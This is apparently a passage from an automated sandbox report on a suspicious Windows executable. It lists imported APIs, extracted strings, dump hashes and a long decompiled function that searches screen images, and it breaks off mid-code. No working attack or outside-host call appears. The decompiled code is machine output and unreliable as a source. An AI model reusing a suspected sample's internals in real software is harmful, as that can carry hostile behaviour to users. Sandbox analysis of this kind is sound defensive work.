0x0043a903
0x0043a80d
0x0043a810
0x0043a812
0x0043a817
0x0043a81e
0x0043a81e
0x0043a831
0x0043a831
0x0043a7c4
0x0043a7c7
0x0043a7c9
0x0043a7ce
0x0043a7d5
0x0043a7d5
0x0043a7e8
0x0043a7e8
0x0043a7c2
0x0043a796
0x0043a78c

APIs

__wcsicoll.LIBCMT ref: 0043A647
__wcsicoll.LIBCMT ref: 0043A659
__wcsicoll.LIBCMT ref: 0043A66B
__wcsicoll.LIBCMT ref: 0043A67D
__wcsicoll.LIBCMT ref: 0043A68F
__wcsicoll.LIBCMT ref: 0043A6A1
_memset.LIBCMT ref: 0043A848
CreateProcessW.KERNEL32 ref: 0043A963
CloseHandle.KERNEL32(?,?,00000000,00000000,00000000,00000000,00000000,?,00000044,?), ref: 0043A975
CloseHandle.KERNEL32(?), ref: 0043A9B6
_memset.LIBCMT ref: 0043A9F3
__wcsicoll.LIBCMT ref: 0043AA3F
_wcschr.LIBCMT ref: 0043AA8B
ShellExecuteExW.SHELL32(0000003C), ref: 0043AB96
GetModuleHandleW.KERNEL32(kernel32.dll,GetProcessId), ref: 0043ABBA
GetProcAddress.KERNEL32(00000000), ref: 0043ABC1

Strings

..., xrefs: 0043AC99, 0043ACB5, 0043ACDF
%s %s, xrefs: 0043A8C4
System verbs unsupported with RunAs., xrefs: 0043A7CE
print, xrefs: 0043A689, 0043A74B
\/., xrefs: 0043AAF4
Verb: <%s>, xrefs: 0043AC4A
String too long., xrefs: 0043A817
find, xrefs: 0043A641, 0043A703
kernel32.dll, xrefs: 0043ABB5
.exe.bat.com.cmd.hta, xrefs: 0043AB25
explore, xrefs: 0043A653, 0043A715
Failed attempt to launch program or document:, xrefs: 0043ACD1, 0043ACE1
Launch Error (possibly related to RunAs):, xrefs: 0043ACCA
edit, xrefs: 0043A677, 0043A739
properties, xrefs: 0043A69B, 0043A75D, 0043AA36
%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>, xrefs: 0043ACE2
open, xrefs: 0043A665, 0043A727
GetProcessId, xrefs: 0043ABB0

Memory Dump Source

Source File: 0000000E.00000002.829171872.0000000000401000.00000020.00020000.sdmp, Offset: 00400000, based on PE: true

Associated: 0000000E.00000002.829161738.0000000000400000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829265052.00000000004AC000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829286847.00000000004BF000.00000002.00020000.sdmp Download File
Associated: 0000000E.00000002.829298897.00000000004D2000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829305543.00000000004D9000.00000004.00020000.sdmp Download File
Associated: 0000000E.00000002.829312384.00000000004DC000.00000002.00020000.sdmp Download File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_400000_nMv8.jbxd

Similarity

API ID: __wcsicoll$Handle$Close_memset$AddressCreateExecuteModuleProcProcessShell_wcschr
String ID: Verb: <%s>$%sAction: <%-0.400s%s>%sParams: <%-0.400s%s>$%s %s$...$.exe.bat.com.cmd.hta$Failed attempt to launch program or document:$GetProcessId$Launch Error (possibly related to RunAs):$String too long.$System verbs unsupported with RunAs.$\/.$edit$explore$find$kernel32.dll$open$print$properties
API String ID: 3967683218-758568768
Opcode ID: 900dc453a70fd96133a711f0ece3ff37b3af39efe1fa14da05e9321da036ddb6
Instruction ID: 16e74938232bc6e616979ea01c2d8e302293f63afe406e613efe7d38e28bca2e
Opcode Fuzzy Hash: 900dc453a70fd96133a711f0ece3ff37b3af39efe1fa14da05e9321da036ddb6
Instruction Fuzzy Hash: 8E22D071A402059BDF20DF69CC85BEBB7B4AF49304F08506BE945A7381E77C9D50CBAA

Uniqueness

Uniqueness Score: -1.00%

Function 00443710, Relevance: 72.6, APIs: 36, Strings: 5, Instructions: 885
windowCOMMON

Download Yara Rule

C-Code - Quality: 88%

			E00443710(void* __fp0, intOrPtr _a4, int _a8, int _a12, intOrPtr _a16, intOrPtr _a20, signed short* _a24) {
				short _v6;
				char _v68;
				struct _ICONINFO _v88;
				signed int _v92;
				signed int _v96;
				struct tagRECT _v112;
				struct HWND__* _v116;
				struct HDC__* _v120;
				void* _v128;
				void* _v132;
				intOrPtr _v136;
				struct HWND__* _v140;
				signed int _v152;
				char _v160;
				struct HDC__* _v164;
				struct HDC__* _v168;
				signed int _v172;
				signed int _v176;
				signed int _v180;
				signed int _v184;
				signed int _v188;
				char _v192;
				int _v196;
				int _v200;
				signed int _v204;
				signed int _v208;
				struct HWND__* _v212;
				struct HWND__* _v216;
				signed int _v220;
				char _v222;
				char _v223;
				signed int _v228;
				signed int _v232;
				signed char* _v236;
				signed int _v240;
				signed int _v244;
				signed int _v248;
				signed int _v252;
				signed int _v256;
				struct HWND__* _v260;
				signed int _v264;
				signed int _v265;
				signed int _v266;
				signed int _v267;
				signed int _v269;
				intOrPtr _v276;
				intOrPtr _v280;
				signed int _v281;
				signed int _v282;
				char _v283;
				void* __ebx;
				void* __edi;
				void* __esi;
				intOrPtr _t293;
				signed int _t296;
				intOrPtr _t300;
				signed int _t303;
				signed int _t307;
				void* _t310;
				signed int _t311;
				signed int _t312;
				signed int _t313;
				void* _t333;
				void* _t339;
				signed int _t340;
				signed int _t342;
				signed int _t347;
				signed int _t348;
				signed int _t350;
				signed int _t356;
				signed int _t357;
				signed int _t358;
				signed int _t359;
				signed int _t360;
				intOrPtr _t361;
				int* _t363;
				signed int _t364;
				intOrPtr _t366;
				signed int _t367;
				signed int _t368;
				signed int _t370;
				signed char* _t371;
				char* _t372;
				signed char* _t373;
				signed int _t374;
				void* _t375;
				signed int _t379;
				signed int _t386;
				signed int _t387;
				signed int _t389;
				signed int _t390;
				signed short* _t391;
				signed int _t392;
				signed int _t393;
				signed int _t394;
				signed int _t396;
				intOrPtr _t397;
				signed int _t398;
				signed int _t399;
				signed int _t401;
				signed int _t402;
				signed int _t405;
				unsigned int _t406;
				signed int _t409;
				signed int _t411;
				struct HWND__* _t413;
				void* _t414;
				void* _t417;
				void* _t418;
				struct HWND__* _t419;
				int _t422;
				signed int _t428;
				signed short* _t429;
				int _t437;
				intOrPtr _t438;
				intOrPtr _t439;
				signed char _t440;
				void* _t441;
				signed int _t443;
				signed int _t448;
				signed int _t449;
				signed int _t455;
				signed int _t460;
				signed int _t462;
				signed int _t463;
				signed int _t464;
				intOrPtr _t465;
				signed int _t469;
				signed int _t470;
				signed int _t471;
				signed int _t473;
				signed int _t474;
				signed int _t477;
				signed int _t478;
				char* _t479;
				signed int _t480;
				signed int _t481;
				signed int _t482;
				signed int _t483;
				signed int _t493;
				signed int _t507;
				signed int _t509;
				signed char _t510;
				signed int _t511;
				signed int _t513;
				signed int _t514;
				intOrPtr _t517;
				signed int _t518;
				signed int _t520;
				signed char _t521;
				signed int _t522;
				intOrPtr _t524;
				signed int _t528;
				void* _t536;
				intOrPtr _t537;
				signed short* _t538;
				signed int _t542;
				struct HDC__* _t543;
				struct HDC__* _t546;
				signed char* _t547;
				signed int _t548;
				signed int _t549;
				signed int _t550;
				signed int _t551;
				signed int _t552;
				signed int _t553;
				struct HWND__* _t554;
				void* _t555;
				struct HICON__* _t556;
				signed int _t559;
				int _t564;
				signed int _t565;
				signed int _t570;
				signed int _t575;
				signed int _t576;
				signed int _t580;
				void* _t582;
				void* _t583;
				void* _t584;
				void* _t585;
				void* _t587;
				void* _t588;

				_t604 = __fp0;
				_t582 = (_t580 & 0xfffffff8) - 0xdc;
				_t443 =  *0x4d7640;
				_push(_t552);
				asm("sbb esi, esi");
				_t553 = _t552 &  *0x4d7644;
				_push(_t536);
				_v96 = _t443;
				_v92 = _t553;
				if(_t443 != 0) {
					E00419D20(_t443, _t536, __fp0);
				}
				if(_t553 != 0) {
					E00419D20(_t553, _t536, _t604);
				}
				_t293 =  *0x4d3b04; // 0x3215110
				_t554 = 0;
				_t537 = 0;
				_t428 =  *(_t293 + 0xf0) & 3;
				_v140 = 0;
				_v136 = 0;
				if(_t428 != 2) {
					_t419 = GetForegroundWindow();
					_v216 = _t419;
					if(_t419 != 0 && IsIconic(_t419) == 0) {
						if(_t428 != 0) {
							__eflags = 0;
							_v112.left = 0;
							_v112.top = 0;
							_t422 = ClientToScreen(_v216,  &_v112);
						} else {
							_t422 = GetWindowRect(_v216,  &_v112);
						}
						if(_t422 != 0) {
							_t554 = _t554 + _v112.left;
							_t537 = _t537 + _v112.top;
							_v140 = _t554;
							_v136 = _t537;
						}
					}
				}
				_t429 = _a24;
				_a8 = _a8 + _t554;
				_a12 = _a12 + _t537;
				_a16 = _a16 + _t554;
				_a20 = _a20 + _t537;
				_v220 = 0;
				_v184 = 0xffffffff;
				_v216 = 0;
				_v200 = 0;
				_v196 = 0;
				_t555 = E00498D06(_t429, 0x2e);
				_t583 = _t582 + 8;
				if(_t555 != 0) {
					_t578 = _t555 + 2;
					_t414 = E00498079(_t537, _t555 + 2, L"ico");
					_t583 = _t583 + 8;
					if(_t414 == 0) {
						L16:
						_v200 = GetSystemMetrics(0x31);
						_v196 = GetSystemMetrics(0x32);
					} else {
						_t417 = E00498079(_t537, _t578, L"exe");
						_t583 = _t583 + 8;
						if(_t417 == 0) {
							goto L16;
						} else {
							_t418 = E00498079(_t537, _t578, L"dll");
							_t583 = _t583 + 8;
							if(_t418 == 0) {
								goto L16;
							}
						}
					}
				}
				_t538 = _t429;
				L18:
				_t296 =  *_t538 & 0x0000ffff;
				if(_t296 == 0x20 || _t296 == 9) {
					_t538 =  &(_t538[1]);
					goto L18;
				}
				__eflags =  *_t538 - 0x2a;
				if( *_t538 != 0x2a) {
					L84:
					_push(0);
					_push( &_v208);
					_push(0);
					_push(_v216);
					_push( &_v192);
					_push(_v196);
					_push(_v200);
					_push(_t429);
					_t556 = E0047FCD0(_t604);
					_t584 = _t583 + 0x20;
					_v132 = _t556;
					__eflags = _t556;
					if(_t556 == 0) {
						goto L77;
					} else {
						_t303 = GetDC(0);
						_t542 = _t303;
						_v164 = _t542;
						__eflags = _t542;
						if(_t542 != 0) {
							__eflags = _v192 - 1;
							_v116 = 0;
							_v216 = 0;
							_v196 = 0;
							_v180 = 0;
							_v128 = 0;
							_v223 = 0;
							if(_v192 != 1) {
								L94:
								_t307 = E00442CF0(_t542, _t556,  &_v172,  &_v160,  &_v222, 8);
								_t585 = _t584 + 0x14;
								_v176 = _t307;
								__eflags = _t307;
								if(_t307 == 0) {
									L136:
									_t559 = _v204;
								} else {
									_t564 = _a16 - _a8 + 1;
									_t437 = _a20 - _a12 + 1;
									_t546 = CreateCompatibleDC(_v164);
									_v120 = _t546;
									__eflags = _t546;
									if(_t546 == 0) {
										goto L136;
									} else {
										_t339 = CreateCompatibleBitmap(_v168, _t564, _t437);
										_v232 = _t339;
										__eflags = _t339;
										if(_t339 == 0) {
											goto L136;
										} else {
											_t340 = SelectObject(_t546, _t339);
											_v152 = _t340;
											__eflags = _t340;
											if(_t340 == 0) {
												goto L136;
											} else {
												_t342 = BitBlt(_t546, 0, 0, _t564, _t437, _v188, _a8, _a12, 0xcc0020);
												__eflags = _t342;
												if(_t342 == 0) {
													goto L136;
												} else {
													_t565 = E00442CF0(_t546, _v276,  &_v248,  &_v204,  &_v281, 8);
													_t585 = _t585 + 0x14;
													_v256 = _t565;
													__eflags = _t565;
													if(_t565 == 0) {
														goto L136;
													} else {
														_t455 = _v232 * _v220;
														_t507 = _v248 * _v204;
														__eflags = _v282;
														_v228 = _t455;
														_v184 = _t507;
														if(_v282 != 0) {
															L102:
															__eflags = _v244 - 0xffffffff;
															if(_v244 != 0xffffffff) {
																_t119 =  &_v244;
																 *_t119 = _v244 & 0x00f8f8f8;
																__eflags =  *_t119;
															}
															_t347 = 0;
															__eflags = _t507;
															if(_t507 > 0) {
																do {
																	 *(_t565 + _t347 * 4) =  *(_t565 + _t347 * 4) & 0x00f8f8f8;
																	_t347 = _t347 + 1;
																	__eflags = _t347 - _t507;
																} while (_t347 < _t507);
															}
															_t547 = _v236;
															_t348 = 0;
															__eflags = _t455;
															if(_t455 > 0) {
																do {
																	 *(_t547 + _t348 * 4) =  *(_t547 + _t348 * 4) & 0x00f8f8f8;
																	_t348 = _t348 + 1;
																	__eflags = _t348 - _t455;
																} while (_t348 < _t455);
																goto L111;
															}
														} else {
															__eflags = _v281;
															if(_v281 == 0) {
																_t547 = _v236;
																L111:
																__eflags = _t455;
																if(_t455 > 0) {
																	_t373 =  &(_t547[3]);
																	do {
																		 *_t373 = 0;
																		_t373 =  &(_t373[4]);
																		_t455 = _t455 - 1;
																		__eflags = _t455;
																	} while (_t455 != 0);
																}
															} else {
																goto L102;
															}
														}
														_t438 = _v280;
														__eflags = _t438 - 1;
														if(_t438 >= 1) {
															_t559 = 0;
															_v264 = 0;
															__eflags = _t507;
															if(_t507 > 0) {
																do {
																	_t350 = _t559;
																	asm("cdq");
																	_t509 = _t350 % _v248;
																	__eflags = _v220 - _v204 - _t350 / _v248;
																	if(_v220 > _v204 - _t350 / _v248) {
																		goto L194;
																	} else {
																		__eflags = _v232 - _v248 - _t509;
																		if(_v232 > _v248 - _t509) {
																			goto L194;
																		} else {
																			_v283 = 1;
																			_v212 = 0;
																			_v260 = 0;
																			_v252 = _t559;
																			__eflags = _v228;
																			if(_v228 > 0) {
																				_t356 = _v240 - _t547;
																				__eflags = _t356;
																				_v283 = 1;
																				_v216 = _t559;
																				_v180 = _t559 * 4;
																				_v208 = _t356;
																				while(1) {
																					_t357 = _t547[2] & 0x000000ff;
																					_t510 = _t547[1];
																					__eflags = _t438 - _t357;
																					if(_t438 <= _t357) {
																						_t460 = _t357 - _t438;
																						__eflags = _t460;
																						_v282 = _t460;
																					} else {
																						_v282 = 0;
																					}
																					_t511 = _t510 & 0x000000ff;
																					_v172 = _t511;
																					__eflags = _t438 - _t511;
																					if(_t438 <= _t511) {
																						_t438 = _v280;
																						_t462 = _t511 - _v280;
																						__eflags = _t462;
																						_v266 = _t462;
																					} else {
																						_v266 = 0;
																					}
																					_t463 =  *_t547 & 0x000000ff;
																					__eflags = _t438 - _t463;
																					if(_t438 <= _t463) {
																						_t513 = _t463 - _v280;
																						__eflags = _t513;
																						_v265 = _t513;
																						_t511 = _v172;
																					} else {
																						_v265 = 0;
																					}
																					_t439 = _v280;
																					__eflags = _t439 - 0xff - _t357;
																					if(_t439 <= 0xff - _t357) {
																						_t358 = _t357 + _t439;
																						__eflags = _t358;
																						_v267 = _t358;
																						_t359 = 0xff;
																					} else {
																						_t359 = 0xff;
																						_v267 = 0xff;
																					}
																					__eflags = _t439 - _t359 - _t511;
																					if(_t439 <= _t359 - _t511) {
																						_t514 = _t511 + _t439;
																						__eflags = _t514;
																						_v269 = _t514;
																					} else {
																						_v269 = _t359;
																					}
																					__eflags = _t439 - _t359 - _t463;
																					if(_t439 <= _t359 - _t463) {
																						_t464 = _t463 + _t439;
																						__eflags = _t464;
																						_v281 = _t464;
																					} else {
																						_v281 = _t359;
																					}
																					_t360 = _v256;
																					_t570 = _v252;
																					_t465 =  *((intOrPtr*)(_t360 + 2 + _t570 * 4));
																					_t517 =  *((intOrPtr*)(_t360 + 1 + _t570 * 4));
																					_t361 =  *((intOrPtr*)(_t360 + _t570 * 4));
																					__eflags = _t465 - _v282;
																					if(_t465 < _v282) {
																						goto L185;
																					}
																					L180:
																					__eflags = _t465 - _v267;
																					if(_t465 > _v267) {
																						goto L185;
																					} else {
																						__eflags = _t517 - _v266;
																						if(_t517 < _v266) {
																							goto L185;
																						} else {
																							__eflags = _t517 - _v269;
																							if(_t517 > _v269) {
																								goto L185;
																							} else {
																								__eflags = _t361 - _v265;
																								if(_t361 < _v265) {
																									goto L185;
																								} else {
																									__eflags = _t361 - _v281;
																									if(_t361 <= _v281) {
																										L188:
																										_t363 =  &(_v212->i);
																										_v212 = _t363;
																										__eflags = _t363 - _v232;
																										if(_t363 >= _v232) {
																											_t364 = _v248;
																											_v180 = _v180 + _t364 * 4;
																											_t469 = _v216 + _t364;
																											__eflags = _t469;
																											_v212 = 0;
																											_v216 = _t469;
																											_v252 = _t469;
																										} else {
																											_v252 = _t570 + 1;
																										}
																										_t366 = _v260 + 1;
																										_t547 =  &(_t547[4]);
																										_v260 = _t366;
																										__eflags = _t366 - _v228;
																										if(_t366 >= _v228) {
																											goto L136;
																										} else {
																											_t438 = _v280;
																											_t357 = _t547[2] & 0x000000ff;
																											_t510 = _t547[1];
																											__eflags = _t438 - _t357;
																											if(_t438 <= _t357) {
																												_t460 = _t357 - _t438;
																												__eflags = _t460;
																												_v282 = _t460;
																											} else {
																												_v282 = 0;
																											}
																											_t511 = _t510 & 0x000000ff;
																											_v172 = _t511;
																											__eflags = _t438 - _t511;
																											if(_t438 <= _t511) {
																												_t438 = _v280;
																												_t462 = _t511 - _v280;
																												__eflags = _t462;
																												_v266 = _t462;
																											} else {
																												_v266 = 0;
																											}
																											_t463 =  *_t547 & 0x000000ff;
																											__eflags = _t438 - _t463;
																											if(_t438 <= _t463) {
																												_t513 = _t463 - _v280;
																												__eflags = _t513;
																												_v265 = _t513;
																												_t511 = _v172;
																											} else {
																												_v265 = 0;
																											}
																											_t439 = _v280;
																											__eflags = _t439 - 0xff - _t357;
																											if(_t439 <= 0xff - _t357) {
																												_t358 = _t357 + _t439;
																												__eflags = _t358;
																												_v267 = _t358;
																												_t359 = 0xff;
																											} else {
																												_t359 = 0xff;
																												_v267 = 0xff;
																											}
																											__eflags = _t439 - _t359 - _t511;
																											if(_t439 <= _t359 - _t511) {
																												_t514 = _t511 + _t439;
																												__eflags = _t514;
																												_v269 = _t514;
																											} else {
																												_v269 = _t359;
																											}
																											__eflags = _t439 - _t359 - _t463;
																											if(_t439 <= _t359 - _t463) {
																												_t464 = _t463 + _t439;
																												__eflags = _t464;
																												_v281 = _t464;
																											} else {
																												_v281 = _t359;
																											}
																											_t360 = _v256;
																											_t570 = _v252;
																											_t465 =  *((intOrPtr*)(_t360 + 2 + _t570 * 4));
																											_t517 =  *((intOrPtr*)(_t360 + 1 + _t570 * 4));
																											_t361 =  *((intOrPtr*)(_t360 + _t570 * 4));
																											__eflags = _t465 - _v282;
																											if(_t465 < _v282) {
																												goto L185;
																											}
																										}
																									} else {
																										goto L185;
																									}
																								}
																							}
																						}
																					}
																					goto L137;
																					L185:
																					__eflags = _v240;
																					if(_v240 == 0) {
																						L187:
																						__eflags =  *_t547 - _v244;
																						if( *_t547 != _v244) {
																							_t438 = _v280;
																							_t559 = _v264;
																							_t547 = _v236;
																							_v283 = 0;
																							goto L194;
																						} else {
																							goto L188;
																						}
																					} else {
																						_t367 = _v208;
																						__eflags = _t547[_t367];
																						if(_t547[_t367] != 0) {
																							goto L188;
																						} else {
																							goto L187;
																						}
																					}
																					goto L137;
																				}
																			}
																		}
																	}
																	goto L137;
																	L194:
																	_t559 = _t559 + 1;
																	_v264 = _t559;
																	__eflags = _t559 - _v184;
																} while (_t559 < _v184);
															}
															goto L195;
														} else {
															__eflags = _t507;
															if(_t507 > 0) {
																_t133 = _t565 + 3; // 0x3
																_t372 = _t133;
																_t474 = _t507;
																do {
																	 *_t372 = 0;
																	_t372 = _t372 + 4;
																	_t474 = _t474 - 1;
																	__eflags = _t474;
																} while (_t474 != 0);
															}
															_t559 = 0;
															_v264 = 0;
															__eflags = _t507;
															if(_t507 <= 0) {
																L195:
																_push(1);
																_push(0);
																_push(0xffffffff);
																_push("1");
																_push( *0x4d7f00);
																L004817E0(_t604);
															} else {
																_t440 =  *_t547;
																_v216 = _t440;
																do {
																	_t470 = _v256;
																	_t548 = _t559 * 4;
																	__eflags =  *((intOrPtr*)(_t548 + _t470)) - _t440;
																	if( *((intOrPtr*)(_t548 + _t470)) == _t440) {
																		L124:
																		_t471 = _v248;
																		_t368 = _t559;
																		asm("cdq");
																		_t518 = _t368 % _t471;
																		__eflags = _v220 - _v204 - _t368 / _t471;
																		if(_v220 > _v204 - _t368 / _t471) {
																			L153:
																			_t559 = _v264;
																			goto L154;
																		} else {
																			__eflags = _v232 - _t471 - _t518;
																			if(_v232 > _t471 - _t518) {
																				goto L153;
																			} else {
																				_t559 = _v264;
																				_t441 = 0;
																				_v283 = 1;
																				_v260 = 0;
																				__eflags = _v228;
																				if(_v228 > 0) {
																					_t371 = _v236;
																					_t520 = _v240 - _t371;
																					__eflags = _t520;
																					_v283 = 1;
																					_t473 = _t559;
																					_v252 = _t548;
																					_v208 = _t520;
																					do {
																						_t521 =  *_t371;
																						_t549 = _v256;
																						__eflags =  *((intOrPtr*)(_t549 + _t559 * 4)) - _t521;
																						if( *((intOrPtr*)(_t549 + _t559 * 4)) == _t521) {
																							goto L132;
																						} else {
																							__eflags = _v240;
																							if(_v240 == 0) {
																								L131:
																								__eflags = _t521 - _v244;
																								if(_t521 != _v244) {
																									_t440 = _v216;
																									_v283 = 0;
																									goto L153;
																								} else {
																									goto L132;
																								}
																							} else {
																								_t550 = _v208;
																								__eflags =  *(_t550 + _t371);
																								if( *(_t550 + _t371) != 0) {
																									goto L132;
																								} else {
																									goto L131;
																								}
																							}
																						}
																						goto L137;
																						L132:
																						_t441 = _t441 + 1;
																						__eflags = _t441 - _v232;
																						if(_t441 >= _v232) {
																							_t522 = _v248;
																							_v252 = _v252 + _t522 * 4;
																							_t441 = 0;
																							_t473 = _t473 + _t522;
																							__eflags = _t473;
																							_t559 = _t473;
																						} else {
																							_t559 = _t559 + 1;
																						}
																						_t524 = _v260 + 1;
																						_t371 =  &(_t371[4]);
																						_v260 = _t524;
																						__eflags = _t524 - _v228;
																					} while (_t524 < _v228);
																					goto L136;
																				}
																			}
																		}
																	} else {
																		_t370 = _v240;
																		__eflags = _t370;
																		if(_t370 == 0) {
																			L123:
																			__eflags = _t440 - _v244;
																			if(_t440 != _v244) {
																				goto L154;
																			} else {
																				goto L124;
																			}
																		} else {
																			__eflags =  *_t370;
																			if( *_t370 != 0) {
																				goto L124;
																			} else {
																				goto L123;
																			}
																		}
																	}
																	goto L137;
																	L154:
																	_t559 = _t559 + 1;
																	_v264 = _t559;
																	__eflags = _t559 - _v184;
																} while (_t559 < _v184);
																goto L195;
															}
														}
													}
												}
											}
										}
									}
								}
								L137:
								ReleaseDC(0, _v164);
								__eflags = _v208;
								if(_v208 == 0) {
									DeleteObject(_v132);
								}
								_t543 = _v116;
								__eflags = _t543;
								if(_t543 != 0) {
									_t333 = _v128;
									__eflags = _t333;
									if(_t333 != 0) {
										SelectObject(_t543, _t333);
									}
									DeleteDC(_t543);
								}
								_t310 = _v216;
								__eflags = _t310;
								if(_t310 != 0) {
									DeleteObject(_t310);
								}
								_t311 = _v176;
								__eflags = _t311;
								if(_t311 != 0) {
									E004985DD(_t311);
									_t585 = _t585 + 4;
								}
								_t312 = _v180;
								__eflags = _t312;
								if(_t312 != 0) {
									E004985DD(_t312);
									_t585 = _t585 + 4;
								}
								_t313 = _v196;
								__eflags = _t313;
								if(_t313 == 0) {
									goto L77;
								} else {
									E004985DD(_t313);
									__eflags = _v223;
									if(_v223 != 0) {
										_t448 = _v96;
										__eflags = _t448;
										if(_t448 != 0) {
											asm("cdq");
											__eflags = _t559 % _v188 - _v140 + _a8;
											asm("cdq");
											E004010E0(_t448, _t559 % _v188 - _v140 + _a8, _t559 % _v188, 0x18);
										}
										_t449 = _v92;
										__eflags = _t449;
										if(_t449 != 0) {
											asm("cdq");
											__eflags = _t559 / _v188 - _v136 + _a12;
											asm("cdq");
											E004010E0(_t449, _t559 / _v188 - _v136 + _a12, _t559 % _v188, 0x18);
										}
										_push(1);
										_push(0);
										_push(0xffffffff);
										_push("0");
										_push( *0x4d7f00);
										return L004817E0(_t604);
									} else {
										return 1;
									}
								}
							} else {
								_t374 = GetIconInfo(_t556,  &_v88);
								__eflags = _t374;
								if(_t374 != 0) {
									_t379 = E00442CF0(_t542, _v88.hbmMask,  &_v172,  &_v160,  &_v222, 1);
									_t584 = _t584 + 0x14;
									_v180 = _t379;
									DeleteObject(_v88.hbmColor);
									DeleteObject(_v88.yHotspot);
								}
								_t375 = E00480640(_t556);
								_t556 = _t375;
								_t584 = _t584 + 4;
								_v132 = _t375;
								__eflags = _t556;
								if(_t556 == 0) {
									goto L77;
								} else {
									goto L94;
								}
							}
						} else {
							__eflags = _v208 - _t303;
							if(_v208 == _t303) {
								__eflags = _v192 - 1;
								_push(_t556);
								if(_v192 != 1) {
									DeleteObject();
								} else {
									DestroyIcon();
								}
							}
							goto L77;
						}
					}
				} else {
					do {
						_t551 =  &(_t538[1]);
						_t386 = E0049AD13(_t538[1] & 0x0000ffff) & 0x0000ffff;
						_t587 = _t583 + 4;
						__eflags = _t386 - 0x48;
						if(_t386 == 0x48) {
							_t575 = _t551 + 2;
							_t387 = _t575;
							while(1) {
								_t477 =  *_t387 & 0x0000ffff;
								__eflags = _t477 - 0x20;
								if(_t477 == 0x20) {
									goto L58;
								}
								L57:
								__eflags = _t477 - 9;
								if(_t477 == 9) {
									goto L58;
								}
								_t478 =  *_t387 & 0x0000ffff;
								__eflags = _t478;
								if(_t478 == 0) {
									L68:
									_push(_t575);
									_v196 = E0049851D();
									goto L69;
								} else {
									__eflags = _t478 - 0x2d;
									if(_t478 == 0x2d) {
										L62:
										_t387 = _t387 + 2;
										__eflags = _t387;
									} else {
										__eflags = _t478 - 0x2b;
										if(_t478 == 0x2b) {
											goto L62;
										}
									}
									__eflags =  *_t387 - 0x30;
									if( *_t387 != 0x30) {
										goto L68;
									} else {
										_t493 =  *(_t387 + 2) & 0x0000ffff;
										__eflags = _t493 - 0x78;
										if(_t493 == 0x78) {
											L66:
											_t392 = E004981D9( *(_t387 + 4) & 0x0000ffff);
											_t587 = _t587 + 4;
											__eflags = _t392;
											if(_t392 == 0) {
												goto L68;
											} else {
												_t393 = E0049A69D(_t575, 0, 0x10);
												_t583 = _t587 + 0xc;
												_v196 = _t393;
											}
										} else {
											__eflags = _t493 - 0x58;
											if(_t493 != 0x58) {
												goto L68;
											} else {
												goto L66;
											}
										}
									}
								}
								goto L70;
								L58:
								_t387 = _t387 + 2;
								_t477 =  *_t387 & 0x0000ffff;
								__eflags = _t477 - 0x20;
								if(_t477 == 0x20) {
									goto L58;
								}
								goto L57;
							}
						} else {
							__eflags = _t386 - 0x57;
							if(_t386 == 0x57) {
								_t576 = _t551 + 2;
								_t394 = _t576;
								while(1) {
									_t481 =  *_t394 & 0x0000ffff;
									__eflags = _t481 - 0x20;
									if(_t481 == 0x20) {
										goto L44;
									}
									L43:
									__eflags = _t481 - 9;
									if(_t481 == 9) {
										goto L44;
									}
									_t482 =  *_t394 & 0x0000ffff;
									__eflags = _t482;
									if(_t482 == 0) {
										L54:
										_push(_t576);
										_v200 = E0049851D();
										goto L69;
									} else {
										__eflags = _t482 - 0x2d;
										if(_t482 == 0x2d) {
											L48:
											_t394 = _t394 + 2;
											__eflags = _t394;
										} else {
											__eflags = _t482 - 0x2b;
											if(_t482 == 0x2b) {
												goto L48;
											}
										}
										__eflags =  *_t394 - 0x30;
										if( *_t394 != 0x30) {
											goto L54;
										} else {
											_t483 =  *(_t394 + 2) & 0x0000ffff;
											__eflags = _t483 - 0x78;
											if(_t483 == 0x78) {
												L52:
												_t396 = E004981D9( *(_t394 + 4) & 0x0000ffff);
												_t587 = _t587 + 4;
												__eflags = _t396;
												if(_t396 == 0) {
													goto L54;
												} else {
													_t397 = E0049A69D(_t576, 0, 0x10);
													_t583 = _t587 + 0xc;
													_v200 = _t397;
												}
											} else {
												__eflags = _t483 - 0x58;
												if(_t483 != 0x58) {
													goto L54;
												} else {
													goto L52;
												}
											}
										}
									}
									goto L70;
									L44:
									_t394 = _t394 + 2;
									_t481 =  *_t394 & 0x0000ffff;
									__eflags = _t481 - 0x20;
									if(_t481 == 0x20) {
										goto L44;
									}
									goto L43;
								}
							} else {
								_t398 = E004987FA(_t551, L"Icon", 4);
								_t587 = _t587 + 0xc;
								__eflags = _t398;
								if(_t398 != 0) {
									_t399 = E004987FA(_t551, L"Trans", 5);
									_t588 = _t587 + 0xc;
									__eflags = _t399;
									if(_t399 != 0) {
										_t401 = E00403EA0(_t551);
										__eflags = _t401;
										if(_t401 == 0) {
											_push(_t551);
											_t402 = E0049851D();
											_t583 = _t588 + 4;
											_v220 = _t402;
										} else {
											_t402 = E0049A69D(_t551, 0, 0x10);
											_t583 = _t588 + 0xc;
											_v220 = _t402;
										}
										__eflags = _t402;
										if(_t402 >= 0) {
											__eflags = _t402 - 0xff;
											if(_t402 > 0xff) {
												_v220 = 0xff;
											}
										} else {
											_v220 = 0;
										}
									} else {
										_t551 = _t551 + 0xa;
										E0049B554( &_v68, _t551, 0x1f);
										_t583 = _t588 + 0xc;
										_v6 = 0;
										_t405 = E004052FA( &_v68, L" \t");
										__eflags = _t405;
										if(_t405 != 0) {
											__eflags = 0;
											 *_t405 = 0;
										}
										_t406 = E0047F7D0( &_v68);
										__eflags = _t406 - 0xffffffff;
										if(_t406 != 0xffffffff) {
											_v184 = (_t406 >> 0x00000008 & 0x000000ff | (_t406 & 0x000000ff) << 0x00000008) << 0x00000008 | _t406 >> 0x00000010 & 0x000000ff;
										} else {
											_t409 = E0049A69D( &_v68, 0, 0x10);
											_t583 = _t583 + 0xc;
											_v184 = _t409;
										}
									}
								} else {
									_t551 = _t551 + 8;
									_t411 = E00403EA0(_t551);
									__eflags = _t411;
									if(_t411 == 0) {
										_push(_t551);
										_v216 = E0049851D();
										L69:
										_t583 = _t587 + 4;
									} else {
										_t413 = E0049A69D(_t551, 0, 0x10);
										_t583 = _t587 + 0xc;
										_v216 = _t413;
									}
								}
							}
						}
						L70:
						__eflags = _t551;
						if(_t551 == 0) {
							L77:
							_t300 =  *0x4d3b04; // 0x3215110
							__eflags =  *(_t300 + 0x100) & 0x00000001;
							if(__eflags != 0) {
